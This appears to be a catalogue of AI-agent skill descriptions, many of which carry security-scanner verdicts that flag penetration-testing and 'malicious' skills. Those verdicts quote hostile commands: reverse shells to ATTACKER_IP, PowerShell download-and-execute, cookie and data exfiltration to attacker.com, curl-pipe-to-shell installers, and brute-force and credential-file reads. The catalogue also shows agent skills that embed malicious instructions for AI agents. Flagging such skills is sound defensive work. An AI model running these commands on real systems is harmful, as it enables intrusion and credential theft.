Design and evaluate programmatic SEO strategies for creating SEO-driven pages at scale using templates and structured data. Use when the user mentions programmatic SEO, pages at scale, template pages, directory pages, location pages, comparison pages, integration pages, or keyword-pattern page generation. This skill focuses on feasibility, strategy, and page system design—not execution unless explicitly requested.

Development skill from everything-claude-code

This skill scaffolds and bundles React + TypeScript + Tailwind + shadcn/ui projects into a single `bundle.html` artifact. It directs running `bash scripts/init-artifact.sh` and `bash scripts/bundle-artifact.sh`, which execute shell commands and install packages via `pnpm`/`npm` (network activity).

When the user wants to plan a product launch, feature announcement, or release strategy. Also use when the user mentions 'launch,' 'Product Hunt,' 'feature release,' 'announcement,' 'go-to-market,' 'beta launch,' 'early access,' 'waitlist,' or 'product update.' This skill covers phased launches, channel strategy, and ongoing launch momentum.

Provides a complete penetration testing methodology covering reconnaissance, scanning, exploitation, persistence, and reporting using tools like `nmap`, `sqlmap`, and `metasploit`. Contains explicit, executable shell commands (e.g., `nmap -sS target.com`, `sqlmap -u "http://target.com/page.php?id=1" --dbs`, `meterpreter> exploit`) and instructions to write to `~/.ssh/authorized_keys` and devices such as `/dev/sdb`.

Development skill from everything-claude-code

This skill is an MCP server development guide and evaluation harness with SDK examples and runnable scripts. It includes commands that execute processes (`python scripts/evaluation.py`, `npm run build`), requires API keys (`ANTHROPIC_API_KEY`, `EXAMPLE_API_KEY`, `GITHUB_TOKEN`), and makes network requests to `https://modelcontextprotocol.io`, `https://raw.githubusercontent.com`, and `https://api.example.com/v1`.

Dangerous skill: instructs running network-fetched installers (e.g., `curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -`) and executing remote installers (`/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)`). It also guides creating/storing secrets in `.env` (e.g., `cp .env.example .env`, `API_KEY`).

Malicious skill that instructs extracting credentials and exfiltrating data to external hosts such as `\\attacker-server.com\share` and `http://attacker.com/`. It documents SQL injection techniques to bypass authentication and retrieve `username`/`password` fields.

Use when receiving code review feedback, before implementing suggestions, especially if feedback seems unclear or technically questionable - requires technical rigor and verification, not performative agreement or blind implementation

This skill should be used when the user asks to "plan a penetration test", "create a security assessment checklist", "prepare for penetration testing", "define pentest scope", "follow security testing best practices", or needs a structured methodology for penetration testing engagements.

When the user wants to create or optimize in-app paywalls, upgrade screens, upsell modals, or feature gates. Also use when the user mentions "paywall," "upgrade screen," "upgrade modal," "upsell," "feature gate," "convert free to paid," "freemium conversion," "trial expiration screen," "limit reached screen," "plan upgrade prompt," or "in-app pricing." Distinct from public pricing pages (see page-cro) — this skill focuses on in-product upgrade moments where the user has already experienced value.

This skill provides expert backend architecture guidance for designing scalable APIs, microservices, event-driven systems, and observability. No security-relevant behaviors detected.

Toolkit for styling artifacts with a theme. These artifacts can be slides, docs, reportings, HTML landing pages, etc. There are 10 pre-set themes with colors/fonts that you can apply to any artifact that has been creating, or can generate a new theme on-the-fly.

This skill guides users through a three-stage co-authoring workflow and creates/edit files (examples: `decision-doc.md`, `technical-spec.md`). It instructs using network integrations such as `Slack`, `Google Drive`, `SharePoint`, and `https://claude.ai` to pull context, which is purpose-aligned.

Expert patterns for Plaid API integration including Link token flows, transactions sync, identity verification, Auth for ACH, balance checks, webhook handling, and fintech compliance best practices. Use when: plaid, bank account linking, bank connection, ach, account aggregation.

This skill guides finishing a development branch and offers four actions (merge, push/create PR, keep, discard). It instructs running shell commands like `npm test / cargo test / pytest / go test ./...` and performing network actions such as `git push -u origin <feature-branch>` and `gh pr create`.

When the user wants to create or optimize an email sequence, drip campaign, automated email flow, or lifecycle email program. Also use when the user mentions "email sequence," "drip campaign," "nurture sequence," "onboarding emails," "welcome sequence," "re-engagement emails," "email automation," or "lifecycle emails." For in-app onboarding, see onboarding-cro.

This skill provides a template and process for requesting code reviews, including a `code-reviewer.md` template and git-based review steps. It includes runnable git commands like `git rev-parse HEAD~1` and instructs dispatching a `superpowers:code-reviewer` subagent via the `Task` tool.

Analyze and optimize individual pages for conversion performance. Use when the user wants to improve conversion rates, diagnose why a page is underperforming, or increase the effectiveness of marketing pages (homepage, landing pages, pricing, feature pages, or blog posts). This skill focuses on diagnosis, prioritization, and testable recommendations— not blind optimization.

High-risk skill: Provides a comprehensive pentest command reference and instructs executing many `bash` commands like `nmap` and `msfconsole` that perform network scans and exploit deployment. It also instructs setting variables such as `LHOST`/`LPORT` and using local files like `/usr/share/wordlists/rockyou.txt`.

Upstash QStash expert for serverless message queues, scheduled jobs, and reliable HTTP-based task delivery without managing infrastructure. Use when: qstash, upstash queue, serverless cron, scheduled http, message queue serverless.

Use when user needs capabilities Claude lacks (image generation, real-time X/Twitter data) or explicitly requests external models ("blockrun", "use grok", "use gpt", "dall-e", "deepseek")

This skill provides guidance for optimizing signup and registration flows, covering field prioritization, UX patterns, measurement, and experiment ideas. No security-relevant behaviors detected.

Project Guidelines Skill (Example)

This skill documents how to build Moodle external web service APIs, including class files, parameter validation, DB operations, service registration, and testing. It includes example network calls to `https://yourmoodle.com/login/token.php` and `https://yourmoodle.com/webservice/rest/server.php`, and shows using credentials (`username=admin`, `password=yourpassword`) to obtain tokens.

Optimize any form that is NOT signup or account registration — including lead capture, contact, demo request, application, survey, quote, and checkout forms. Use when the goal is to increase form completion rate, reduce friction, or improve lead quality without breaking compliance or downstream workflows.

Dangerous skill provides step-by-step WordPress penetration testing including scanning, enumeration, credential brute-force, and exploitation. It contains explicit shell and backdoor instructions such as `exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'");` and `wpscan --url http://target.com -U admin -P /usr/share/wordlists/rockyou.txt`.

This skill provides guidance for designing and optimizing referral and affiliate programs, including incentive structures, fraud prevention, measurement, tools, and launch checklists. No security-relevant behaviors detected.

Expert patterns for Segment Customer Data Platform including Analytics.js, server-side tracking, tracking plans with Protocols, identity resolution, destinations configuration, and data governance best practices. Use when: segment, analytics.js, customer data platform, cdp, tracking plan.

High-risk skill for conducting cloud penetration tests across Azure, AWS, and GCP that provides reconnaissance, exploitation, persistence, and credential-harvesting techniques. It includes remote-execution commands like `curl https://sdk.cloud.google.com | bash`, metadata access `http://169.254.169.254/...`, and saving tokens to `C:\Temp\AzureAccessToken.json`.

Create and optimize popups, modals, overlays, slide-ins, and banners to increase conversions without harming user experience or brand trust.

When the user wants to plan, evaluate, or build a free tool for marketing purposes — lead generation, SEO value, or brand awareness. Also use when the user mentions "engineering as marketing," "free tool," "marketing tool," "calculator," "generator," "interactive tool," "lead gen tool," "build a tool for leads," or "free resource." This skill bridges engineering and marketing — useful for founders and technical marketers.

Malicious skill that instructs downloading and executing remote code and creating reverse shells (`curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh`, `wget http://ATTACKER_IP/exploit.c; gcc exploit.c -o exploit; ./exploit`, `bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1`). It presents itself as a Linux privilege-escalation guide covering `sudo`, SUID, cron, kernel`, `PATH`, and `NFS` techniques.

Dangerous skill providing step-by-step Active Directory offensive playbooks. It contains explicit shell commands and network calls to `10.10.10.10` and `dc.domain.local`, and instructs secrets handling such as `secretsdump.py` and `export KRB5CCNAME`.

This skill provides step-by-step instructions to configure and test HTTP/HTTPS, SNMP, and SMB services for penetration-testing labs. It contains many `sudo` shell commands (e.g., `sudo apt update && sudo apt install apache2`, `echo "rocommunity public" | sudo tee -a /etc/snmp/snmpd.conf`) and explicit network calls like `nmap -p 443 192.168.1.1`.

Knowledge and utilities for creating animated GIFs optimized for Slack. Provides constraints, validation tools, and animation concepts. Use when users request animated GIFs for Slack like "make me a GIF of X doing Y for Slack."

Dangerous skill: contains extensive `ssh`, `nmap`, `hydra`, and `msfconsole` commands enabling remote access, brute-force, tunneling, and post-exploitation. It instructs reading `~/.ssh/id_rsa`, modifying `~/.ssh/authorized_keys`, and running arbitrary shell and network commands.

High-risk skill describing HTML injection offensive techniques and phishing payloads. It contains payloads that read `document.cookie` and exfiltrate data to `http://attacker.com`, and includes `curl` and Python examples that call `http://target.com` and `http://evil.com`.

Create interface designs, wireframes, and design systems. Masters user research, accessibility standards, and modern design tools. Specializes in design tokens, component libraries, and inclusive design. Use PROACTIVELY for design systems, user flows, or interface optimization.

Dangerous skill for SMTP penetration testing that instructs running commands such as `nmap`, `nc`, `telnet`, and `hydra` against `TARGET_IP`/`mail.target.com`. It explicitly directs shell execution and remote network scans and provides credential brute-force commands like `hydra -l admin -P /usr/share/wordlists/rockyou.txt smtp://TARGET_IP`.

Dangerous skill: provides comprehensive Windows privilege-escalation techniques including enumeration, credential harvesting, service and kernel exploits, and payload execution. It contains explicit commands that read `C:\Windows\System32\config\SAM`, run binaries (e.g., `msiexec`, `sc config`, `JuicyPotato.exe`), and connect to `10.10.10.10:4444`.

Scrapes content based on a preset URL list, filters high-quality technical information, and generates daily Markdown reports.

Malicious skill: contains obfuscated download-and-execute setup, shell commands and payload generation that enable credential harvesting and exfiltration to `192.168.1.50`. It documents Metasploit usage for penetration testing, including `msfconsole` and `msfvenom` examples.

Dangerous skill: contains explicit `shell` and `PowerShell` commands that execute binaries and fetch remote payloads (e.g., `iex (iwr http://attacker/shell.ps1)`) and tools for credential dumping (e.g., `mimikatz`, `NTDS.dit`). It provides comprehensive post‑exploitation privilege escalation techniques for Linux, Windows, and Active Directory.

Build production-ready LLM applications, advanced RAG systems, and intelligent agents. Implements vector search, multimodal AI, agent orchestration, and enterprise AI integrations. Use PROACTIVELY for LLM features, chatbots, AI agents, or AI-powered applications.

Guidelines for modern Avalonia UI layout using Zafiro.Avalonia, emphasizing shared styles, generic components, and avoiding XAML redundancy.

Master Flutter development with Dart 3, advanced widgets, and multi-platform deployment. Handles state management, animations, testing, and performance optimization for mobile, web, desktop, and embedded platforms. Use PROACTIVELY for Flutter architecture, UI implementation, or cross-platform features.

Automatically fetch latest library/framework documentation for Claude Code via Context7 API

Optimal ViewModel and Wizard creation patterns for Avalonia using Zafiro and ReactiveUI.

Expert integration of Supabase Auth with Next.js App Router Use when: supabase auth next, authentication next.js, login supabase, auth middleware, protected route.

Mandatory skills, conventions, and behavioral rules for Avalonia UI development using the Zafiro toolkit.

Expert Kubernetes architect specializing in cloud-native infrastructure, advanced GitOps workflows (ArgoCD/Flux), and enterprise container orchestration. Masters EKS/AKS/GKE, service mesh (Istio/Linkerd), progressive delivery, multi-tenancy, and platform engineering. Handles security, observability, cost optimization, and developer experience. Use PROACTIVELY for K8s architecture, GitOps implementation, or cloud-native platform design.

Professional code review with auto CHANGELOG generation, integrated with Codex AI

Master software architect specializing in modern architecture patterns, clean architecture, microservices, event-driven systems, and DDD. Reviews system designs and code changes for architectural integrity, scalability, and maintainability. Use PROACTIVELY for architectural decisions.

Deep web scraping, screenshots, PDF parsing, and website crawling using Firecrawl API

Expert guidance for distributed NoSQL databases (Cassandra, DynamoDB). Focuses on mental models, query-first modeling, single-table design, and avoiding hot partitions in high-scale systems.

Orchestrates design workflows by routing work through brainstorming, multi-agent review, and execution readiness in the correct order. Prevents premature implementation, skipped validation, and unreviewed high-risk designs.

This skill helps create importable Obsidian Web Clipper JSON templates. It instructs fetching pages via `WebFetch` (e.g., `WebFetch(url="https://example.com/recipe/chocolate-cake")`) and reading local base files like `Templates/Bases/*.base`, so network and filesystem access are required.

This skill is a code-refactoring playbook offering patterns, CI examples, and refactor templates for clean code and SOLID principles. It includes examples that connect to `smtp.gmail.com` and recommends storing secrets via environment variables (e.g., `password = "..."`).

This skill provides backend security coding guidance and actionable best practices and references `resources/implementation-playbook.md` for detailed examples. No security-relevant behaviors detected.

Expert security auditor specializing in DevSecOps, comprehensive cybersecurity, and compliance frameworks. Masters vulnerability assessment, threat modeling, secure authentication (OAuth2/OIDC), OWASP standards, cloud security, and security automation. Handles DevSecOps integration, compliance (GDPR/HIPAA/SOC2), and incident response. Use PROACTIVELY for security audits, DevSecOps, or compliance implementation.

This skill provides comprehensive Bash scripting guidance, templates, and best practices for production automation and CI/CD. It includes explicit shell commands (e.g., `timeout 30s curl ...`, `rm -rf -- "$dir"`) and env var usage (e.g., `: "${REQUIRED_VAR:?not set}"`), enabling script execution and external network calls.

Semantic search, similar content discovery, and structured research using Exa API

Web search, content extraction, crawling, and research capabilities using Tavily API

Master REST and GraphQL API design principles to build intuitive, scalable, and maintainable APIs that delight developers. Use when designing new APIs, reviewing API specifications, or establishing API design standards.

Expert database architect specializing in data layer design from scratch, technology selection, schema modeling, and scalable database architectures. Masters SQL/NoSQL/TimeSeries database selection, normalization strategies, migration planning, and performance-first design. Handles both greenfield architectures and re-architecture of existing systems. Use PROACTIVELY for database architecture, technology selection, or data modeling decisions.

High-risk skill that installs and runs BusyBox on Windows. It instructs executing PowerShell commands that download `busybox.exe` from `https://frippery.org/files/busybox/busybox64.exe` and reads `HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion`.

Master Python 3.12+ with modern features, async programming, performance optimization, and production-ready practices. Expert in the latest Python ecosystem including uv, ruff, pydantic, and FastAPI. Use PROACTIVELY for Python development, optimization, or advanced Python patterns.

This skill provides code explanation, visual diagrams, and step-by-step walkthroughs and references `resources/implementation-playbook.md`. No security-relevant behaviors detected.

Generate comprehensive market opportunity analysis with TAM/SAM/SOM calculations

This skill is a code refactoring playbook that provides patterns, CI examples, and migration guidance. It references local files like `resources/implementation-playbook.md` and examples that connect to external services such as `smtp.gmail.com` and local hosts like `localhost`.

Build production-ready monitoring, logging, and tracing systems. Implements comprehensive observability strategies, SLI/SLO management, and incident response workflows. Use PROACTIVELY for monitoring infrastructure, performance optimization, or production reliability.

Build production-ready Web3 applications, smart contracts, and decentralized systems. Implements DeFi protocols, NFT platforms, DAOs, and enterprise blockchain integrations. Use PROACTIVELY for smart contracts, Web3 apps, DeFi protocols, or blockchain infrastructure.

Expert startup business analyst specializing in market sizing, financial modeling, competitive analysis, and strategic planning for early-stage companies. Use PROACTIVELY when the user asks about market opportunity, TAM/SAM/SOM, financial projections, unit economics, competitive landscape, team planning, startup metrics, or business strategy for pre-seed through Series A startups.

Implement proven backend architecture patterns including Clean Architecture, Hexagonal Architecture, and Domain-Driven Design. Use when architecting complex backend systems or refactoring existing applications for better maintainability.

Build React components, implement responsive layouts, and handle client-side state management. Masters React 19, Next.js 15, and modern frontend architecture. Optimizes performance and ensures accessibility. Use PROACTIVELY when creating UI components or fixing frontend issues.

Elite code review expert specializing in modern AI-powered code analysis, security vulnerabilities, performance optimization, and production reliability. Masters static analysis tools, security scanning, and configuration review with 2024/2025 best practices. Use PROACTIVELY for code quality assurance.

Build high-performance async APIs with FastAPI, SQLAlchemy 2.0, and Pydantic V2. Master microservices, WebSockets, and modern Python async patterns. Use PROACTIVELY for FastAPI development, async optimization, or API architecture.

The skill provides frontend security guidance for XSS prevention, CSP configuration, token handling, and client-side hardening. No security-relevant behaviors detected; it references an internal resource `resources/implementation-playbook.md`.

You are a technical debt expert specializing in identifying, quantifying, and prioritizing technical debt in software projects. Analyze the codebase to uncover debt, assess its impact, and create acti

Orchestrate end-to-end backend feature development from requirements to deployment. Use when coordinating multi-phase feature delivery across teams and services.

Master Go 1.21+ with modern patterns, advanced concurrency, performance optimization, and production-ready microservices. Expert in the latest Go ecosystem including generics, workspaces, and cutting-edge frameworks. Use PROACTIVELY for Go development, architecture design, or performance optimization.

Master modern business analysis with AI-powered analytics, real-time dashboards, and data-driven insights. Build comprehensive KPI frameworks, predictive models, and strategic recommendations. Use PROACTIVELY for business intelligence or strategic analysis.

Expert performance engineer specializing in modern observability, application optimization, and scalable system performance. Masters OpenTelemetry, distributed tracing, load testing, multi-tier caching, Core Web Vitals, and performance monitoring. Handles end-to-end optimization, real user monitoring, and scalability patterns. Use PROACTIVELY for performance optimization, observability, or scalability challenges.

Elite content marketing strategist specializing in AI-powered content creation, omnichannel distribution, SEO optimization, and data-driven performance marketing. Masters modern content tools, social media automation, and conversion optimization with 2024/2025 best practices. Use PROACTIVELY for comprehensive content marketing.

Optimize multi-agent systems with coordinated profiling, workload distribution, and cost-aware orchestration. Use when improving agent performance, throughput, or reliability.

Expert DevOps troubleshooter specializing in rapid incident response, advanced debugging, and modern observability. Masters log analysis, distributed tracing, Kubernetes debugging, performance optimization, and root cause analysis. Handles production outages, system reliability, and preventive monitoring. Use PROACTIVELY for debugging, incident response, or system troubleshooting.

Master API documentation with OpenAPI 3.1, AI-powered tools, and modern developer experience practices. Create interactive docs, generate SDKs, and build comprehensive developer portals. Use PROACTIVELY for API documentation or developer portal creation.

Expert cloud architect specializing in AWS/Azure/GCP multi-cloud infrastructure design, advanced IaC (Terraform/OpenTofu/CDK), FinOps cost optimization, and modern architectural patterns. Masters serverless, microservices, security, compliance, and disaster recovery. Use PROACTIVELY for cloud architecture, cost optimization, migration planning, or multi-cloud strategies.

Generate comprehensive investor-ready business case document with market, solution, financials, and strategy

Create detailed 3-5 year financial model with revenue, costs, cash flow, and scenarios

Build financial models, backtest trading strategies, and analyze market data. Implements risk metrics, portfolio optimization, and statistical arbitrage. Use PROACTIVELY for quantitative finance, trading algorithms, or risk analysis.

Develop React Native, Flutter, or native mobile apps with modern architecture patterns. Masters cross-platform development, native integrations, offline sync, and app store optimization. Use PROACTIVELY for mobile features, cross-platform code, or app optimization.

Build scalable data pipelines, modern data warehouses, and real-time streaming architectures. Implements Apache Spark, dbt, Airflow, and cloud-native data platforms. Use PROACTIVELY for data pipeline design, analytics infrastructure, or modern data stack implementation.

Write and maintain Architecture Decision Records (ADRs) following best practices for technical decision documentation. Use when documenting significant technical decisions, reviewing past architectural choices, or establishing decision processes.

Provides a detailed blueprint for building real-time conversational voice AI engines with async worker pipelines, streaming transcription, LLM agents, and TTS. The skill documents integration with external providers and networked APIs and references credentials like `openaiApiKey`, `deepgramApiKey`, and `googleCredentials`, requiring network access and secret handling.

Master TypeScript with advanced types, generics, and strict type safety. Handles complex type systems, decorators, and enterprise-grade patterns. Use PROACTIVELY for TypeScript architecture, type inference optimization, or advanced typing patterns.

This skill provides AI-powered code review automation and CI/CD integration. It executes CLI tools (`sonar-scanner`, `semgrep`, `trufflehog`), reads environment secrets (`GITHUB_TOKEN`, `ANTHROPIC_API_KEY`, `OPENAI_API_KEY`) and invokes external model/APIs (`Anthropic`, GitHub).

Master Rust 1.75+ with modern async patterns, advanced type system features, and production-ready systems programming. Expert in the latest Rust ecosystem including Tokio, axum, and cutting-edge crates. Use PROACTIVELY for Rust development, performance optimization, or systems programming.

Expert data scientist for advanced analytics, machine learning, and statistical modeling. Handles complex data analysis, predictive modeling, and business intelligence. Use PROACTIVELY for data analysis tasks, ML modeling, statistical analysis, and data-driven insights.

Opinionated, evolving constraints to guide agents when building interfaces

This skill provides a comprehensive API mock server playbook for designing mock routes, scenarios, data generation, testing, and deployment. It references external resources like `https://unpkg.com/swagger-ui-dist/swagger-ui-bundle.js`, includes a Docker healthcheck that runs `curl -f "http://localhost:3001/health"`, and middleware that records `request.headers`.

Develop native iOS applications with Swift/SwiftUI. Masters iOS 18, SwiftUI, UIKit integration, Core Data, networking, and App Store optimization. Use PROACTIVELY for iOS-specific features, App Store optimization, or native iOS development.

This skill provides PostgreSQL schema-design guidance covering data types, indexing, constraints, partitioning, RLS, and safe migration practices. No security-relevant behaviors detected.

This skill provides guidance and examples for building accessible Radix UI design systems, including code snippets and `npm install`/`npx` setup commands. No security-relevant behaviors detected.

Coordinate multi-layer security scanning and hardening across application, infrastructure, and compliance controls.

Analyzes keyword usage in provided content, calculates density, suggests semantic variations and LSI keywords based on the topic. Prevents over-optimization. Use PROACTIVELY for content optimization.

Systematic improvement of existing agents through performance analysis, prompt engineering, and continuous iteration.

Writes SEO-optimized content based on provided keywords and topic briefs. Creates engaging, comprehensive content following best practices. Use PROACTIVELY for content creation tasks.

This skill provides a code-review playbook, checklists, examples, and templates for reviewing pull requests, security, performance, and tests. No security-relevant behaviors detected.

Creates comprehensive technical documentation from existing codebases. Analyzes architecture, design patterns, and implementation details to produce long-form technical manuals and ebooks. Use PROACTIVELY for system documentation, architecture guides, or technical deep-dives.

Expert in secure mobile coding practices specializing in input validation, WebView security, and mobile-specific security patterns. Use PROACTIVELY for mobile security implementations or mobile security code reviews.

Expert Terraform/OpenTofu specialist mastering advanced IaC automation, state management, and enterprise infrastructure patterns. Handles complex module design, multi-cloud deployments, GitOps workflows, policy as code, and CI/CD integration. Covers migration strategies, security best practices, and modern IaC ecosystems. Use PROACTIVELY for advanced IaC, state management, or infrastructure automation.

This skill provides expert guidance and templates for crafting prompts and workflows for the Google Stitch UI design tool. No security-relevant behaviors detected.

Senior embedded software engineer specializing in firmware and driver development for ARM Cortex-M microcontrollers (Teensy, STM32, nRF52, SAMD). Decades of experience writing reliable, optimized, and maintainable embedded code with deep expertise in memory barriers, DMA/cache coherency, interrupt-driven I/O, and peripheral drivers.

Optimize end-to-end application performance with profiling, observability, and backend/frontend tuning. Use when coordinating performance optimization across the stack.

Expert reverse engineer specializing in binary analysis, disassembly, decompilation, and software analysis. Masters IDA Pro, Ghidra, radare2, x64dbg, and modern RE toolchains. Handles executable analysis, library inspection, protocol extraction, and vulnerability research. Use PROACTIVELY for binary analysis, CTF challenges, security research, or understanding undocumented software.

This skill extracts YouTube transcripts and generates comprehensive summaries using LLMs. It runs shell commands (e.g., `pip install youtube-transcript-api`, `./extract-transcript.py`) and performs network operations to `https://github.com/ericgandrade/cli-ai-skills.git` and YouTube URLs.

Expert database optimizer specializing in modern performance tuning, query optimization, and scalable architectures. Masters advanced indexing, N+1 resolution, multi-tier caching, partitioning strategies, and cloud database optimization. Handles complex query analysis, migration strategies, and performance monitoring. Use PROACTIVELY for database optimization, performance issues, or scalability challenges.

This skill provides comprehensive guidance on TypeScript's advanced type system, with examples and a companion resource `resources/implementation-playbook.md`. No security-relevant behaviors detected.

Execute database migrations across ORMs and platforms with zero-downtime strategies, data transformation, and rollback procedures. Use when migrating databases, changing schemas, performing data transformations, or implementing zero-downtime deployment strategies.

AWS development with infrastructure automation and cloud architecture patterns

This skill provides prompt-engineering patterns, templates, example datasets, and a prompt-optimization script for improving LLM prompts. It contains code that issues LLM network calls (e.g., `openai.ChatCompletion.create`, `self.client.complete`) but no instructions to access secrets, execute shell commands, or exfiltrate data.

This skill generates documentation from code, templates, and CI/CD workflows. It includes example shell commands (`pip install`, `git clone`), references external resources (`https://cdn.jsdelivr.net/npm/swagger-ui-dist@latest/swagger-ui.css`), and uses CI secrets (`GITHUB_TOKEN`).

You are a technical debt expert specializing in identifying, quantifying, and prioritizing technical debt in software projects. Analyze the codebase to uncover debt, assess its impact, and create acti

This skill provides WCAG accessibility audit guidance, code samples, and CI workflow examples for automated and manual testing. It instructs executing shell commands such as `npm ci`, `npm start &`, `npx pa11y` and performing web requests via `page.goto(url, { waitUntil: "networkidle2" })`.

Master Django 5.x with async views, DRF, Celery, and Django Channels. Build scalable web applications with proper architecture, testing, and deployment. Use PROACTIVELY for Django development, ORM optimization, or complex Django patterns.

Debugging specialist for errors, test failures, and unexpected behavior. Use proactively when encountering any issues.

Use when working with full stack orchestration full stack feature

Master TDD orchestrator specializing in red-green-refactor discipline, multi-agent workflow coordination, and comprehensive test-driven development practices. Enforces TDD best practices across teams with AI-assisted testing and modern frameworks. Use PROACTIVELY for TDD implementation and governance.

You are a data pipeline architecture expert specializing in scalable, reliable, and cost-effective data pipelines for batch and streaming data processing.

Expert network engineer specializing in modern cloud networking, security architectures, and performance optimization. Masters multi-cloud connectivity, service mesh, zero-trust networking, SSL/TLS, global load balancing, and advanced troubleshooting. Handles CDN optimization, network automation, and compliance. Use PROACTIVELY for network design, connectivity issues, or performance optimization.

Master Python asyncio, concurrent programming, and async/await patterns for high-performance applications. Use when building async APIs, concurrent systems, or I/O-bound applications requiring non-blocking operations.

Expert database administrator specializing in modern cloud databases, automation, and reliability engineering. Masters AWS/Azure/GCP database services, Infrastructure as Code, high availability, disaster recovery, performance optimization, and compliance. Handles multi-cloud strategies, container databases, and cost optimization. Use PROACTIVELY for database architecture, operations, or reliability engineering.